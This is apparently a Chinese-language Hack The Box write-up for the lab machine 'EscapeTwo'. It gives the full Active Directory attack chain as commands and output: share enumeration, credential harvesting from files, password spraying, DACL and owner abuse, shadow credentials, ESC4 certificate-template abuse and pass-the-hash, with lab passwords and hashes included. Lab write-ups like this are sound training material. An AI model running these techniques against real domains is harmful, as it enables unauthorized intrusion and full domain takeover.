EscapeTwo

题目中给出了一组账号和密码:

As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su

nmap扫一下:

root@lbz-lenovo:/mnt/c/Users/86138# nmap -sC -sV -T4 10.129.221.182
Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-02 13:48 CST
Nmap scan report for 10.129.221.182
Host is up (0.92s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE    VERSION
53/tcp   open  tcpwrapped
88/tcp   open  tcpwrapped
135/tcp  open  tcpwrapped
139/tcp  open  tcpwrapped
389/tcp  open  tcpwrapped
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-03-02T05:50:16+00:00; -1s from scanner time.
445/tcp  open  tcpwrapped
464/tcp  open  tcpwrapped
593/tcp  open  tcpwrapped
636/tcp  open  tcpwrapped
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-03-02T05:50:10+00:00; -3s from scanner time.
1433/tcp open  ms-sql-s   Microsoft SQL Server  15.00.2000.00
| ms-sql-ntlm-info:
|   Target_Name: SEQUEL
|   NetBIOS_Domain_Name: SEQUEL
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: sequel.htb
|   DNS_Computer_Name: DC01.sequel.htb
|   DNS_Tree_Name: sequel.htb
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-03-02T05:45:48
|_Not valid after:  2055-03-02T05:45:48
|_ssl-date: 2025-03-02T05:50:12+00:00; -4s from scanner time.
3268/tcp open  tcpwrapped
3269/tcp open  tcpwrapped
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-03-02T05:50:10+00:00; -3s from scanner time.Host script results:
|_clock-skew: mean: -2s, deviation: 1s, median: -3s
| ms-sql-info:
|   10.129.221.182:1433:
|     Version:
|       name: Microsoft SQL Server
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server
|_    TCP port: 1433
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-03-02T05:49:33
|_  start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.53 seconds

发现开启了smb服务,然而无法横向拿shell,尝试查看smb开启的共享服务.

crackmapexec smb 10.129.221.182 -u rose -p KxEPkKe6R8su --shares

查看一下Accounting Department READ中有什么:

smbclient -U rose%KxEPkKe6R8su '//10.129.221.182/Accounting Department'

然而这两个xlsx文件直接打开会报错.将其以压缩包形式解压,在accounts.xlsx中发现一个sharedStrings.xml,其中包含几个用户名和密码.

angela : 0fwz7Q4mSpurIt99
oscar  : 86LxLBMgEWaKUnBG
kevin  : Md9Wlq1E5bZnVDVo
sa     : MSSQLP@ssw0rd!

显然最后一个可以用来mssql登录,通过mdut进行登录.发现Users中包含文件列表如下:

sql_svc中啥也没有,估计得想办法知道ryan的用户名和密码.
在SQL2019中存在文件sql-Configuration.INI,是mssql的配置文件,下下来看看.

[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False" 
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True

发现存在sql_svc,其密码为WqSZAF6CysDQbGb3.使用这些密码去喷洒ryan,结果如下:

LDAP        10.129.221.182  389    DC01             [+] sequel.htb\ryan:WqSZAF6CysDQbGb3

最开始smb喷洒的,啥也没喷出来.换ldap爆出来这么一个用法.使用impacket包中的exec试了一遍,都连不上.

atexec.py
dcomexec.py
psexec.py
smbexec.py
wmiexec.py

最后用nxc中的winrmexec.py连上了.然而似乎只能回显单行命令.发现有evil-winrm这个工具.

evil-winrm -i 10.129.221.182 -u ryan -p WqSZAF6CysDQbGb3

直接给了个交互的shell,非常爽.这个shell是基于powershell的而不是dos的,查找第一个flag.

使用bloodhound-python进行信息搜集:

python3 bloodhound.py -u ryan -p WqSZAF6CysDQbGb3 -d sequel.htb -dc DC01.sequel.htb -ns 10.129.221.182 -c All --zip

发现这个ryan对ca_svc有写的权限,通过修改dacl来获得ca_csv的完全控制权.
如果我们有ca_csv的凭据的话这个时候可以直接给ca_csv改一个dcsync去抓哈希了,然而没有.
注意这里要先修改一下时区,不然会出现各种奇怪的问题(猜测和证书时效有关)

sudo ntpdate escapetwo.htb

首先给ryan一个ca_svc的所有权:

impacket-owneredit -action write -new-owner ryan -target ca_svc sequel.htb/ryan:WqSZAF6CysDQbGb3

然后改ca_csv的dacl,使ryan完全控制ca_svc.

impacket-dacledit -action write -rights FullControl -principal ryan -target ca_svc sequel.htb/ryan:WqSZAF6CysDQbGb3

接下来去打一手通过影子凭证获得ca_csv的NTLM.这个攻击应该是拥有ca_csv全部权限就可以打的

certipy-ad shadow auto -u 'ryan@sequel.htb' -p 'WqSZAF6CysDQbGb3' -account 'ca_svc' -dc-ip 10.129.219.167
Certipy v4.8.2 - by Oliver Lyak (ly4k)[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'b52c0cf5-dbad-ff9a-71a5-111e7fbe3a7c'
[*] Adding Key Credential with device ID 'b52c0cf5-dbad-ff9a-71a5-111e7fbe3a7c' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'b52c0cf5-dbad-ff9a-71a5-111e7fbe3a7c' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e20bc2b7fce

通过得到的哈希去进行枚举:

certipy-ad find -u 'ca_svc@sequel.htb' -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -dc-ip 10.129.219.167 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Enumeration output:
Certificate Authorities0CA Name                             : sequel-DC01-CADNS Name                            : DC01.sequel.htbCertificate Subject                 : CN=sequel-DC01-CA, DC=sequel, DC=htbCertificate Serial Number           : 152DBD2D8E9C079742C0F3BFF2A211D3Certificate Validity Start          : 2024-06-08 16:50:40+00:00Certificate Validity End            : 2124-06-08 17:00:40+00:00Web Enrollment                      : DisabledUser Specified SAN                  : DisabledRequest Disposition                 : IssueEnforce Encryption for Requests     : EnabledPermissionsOwner                             : SEQUEL.HTB\AdministratorsAccess RightsManageCertificates              : SEQUEL.HTB\AdministratorsSEQUEL.HTB\Domain AdminsSEQUEL.HTB\Enterprise AdminsManageCa                        : SEQUEL.HTB\AdministratorsSEQUEL.HTB\Domain AdminsSEQUEL.HTB\Enterprise AdminsEnroll                          : SEQUEL.HTB\Authenticated Users
Certificate Templates0Template Name                       : DunderMifflinAuthenticationDisplay Name                        : Dunder Mifflin AuthenticationCertificate Authorities             : sequel-DC01-CAEnabled                             : TrueClient Authentication               : TrueEnrollment Agent                    : FalseAny Purpose                         : FalseEnrollee Supplies Subject           : FalseCertificate Name Flag               : SubjectRequireCommonNameSubjectAltRequireDnsEnrollment Flag                     : AutoEnrollmentPublishToDsPrivate Key Flag                    : 16842752Extended Key Usage                  : Client AuthenticationServer AuthenticationRequires Manager Approval           : FalseRequires Key Archival               : FalseAuthorized Signatures Required      : 0Validity Period                     : 1000 yearsRenewal Period                      : 6 weeksMinimum RSA Key Length              : 2048PermissionsEnrollment PermissionsEnrollment Rights               : SEQUEL.HTB\Domain AdminsSEQUEL.HTB\Enterprise AdminsObject Control PermissionsOwner                           : SEQUEL.HTB\Enterprise AdminsFull Control Principals         : SEQUEL.HTB\Cert PublishersWrite Owner Principals          : SEQUEL.HTB\Domain AdminsSEQUEL.HTB\Enterprise AdminsSEQUEL.HTB\AdministratorSEQUEL.HTB\Cert PublishersWrite Dacl Principals           : SEQUEL.HTB\Domain AdminsSEQUEL.HTB\Enterprise AdminsSEQUEL.HTB\AdministratorSEQUEL.HTB\Cert PublishersWrite Property Principals       : SEQUEL.HTB\Domain AdminsSEQUEL.HTB\Enterprise AdminsSEQUEL.HTB\AdministratorSEQUEL.HTB\Cert Publishers[!] VulnerabilitiesESC4                              : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions                                                        

发现了模板的ESC4漏洞.其ca为sequel-DC01-CA,Template Name为DunderMifflinAuthentication.
用ca_scv的哈希去重写模板,使其符合攻击要求:

certipy-ad template -u ca_svc@sequel.htb -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -template 'DunderMifflinAuthentication' -target DC01.sequel.htb -ns 10.129.89.45

接下来去申请一份证书:

certipy-ad req -u ca_svc@sequel.htb -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -ca sequel-DC01-CA -template 'DunderMifflinAuthentication' -upn Administrator@sequel.htb -target DC01.sequel.htb -ns 10.129.89.45 -dns 10.129.89.45 -dc-ip 10.129.89.45

这里需要注意一个问题,就是在证书枚举的时候出现了这样的字段

Certificate Name Flag: SubjectRequireCommonName,SubjectAltRequireDns

所以必须要在命令中添加-ns和-dns参数.-target不知道,但最好也加上.这里卡了好久好久(:
导入得到的证书,拿到了域管理员的NTLM:

certipy-ad auth -pfx administrator_10.pfx -dc-ip 10.129.249.162

PTH登录.

impacket-psexec -hashes :7a8d4e04986afa8ed4060f75e5a0b3ff Administrator@sequel.htb -codec gbk

在administrator的桌面找到flag.

总结:我是渗透飞舞,一个靶场打了一整天.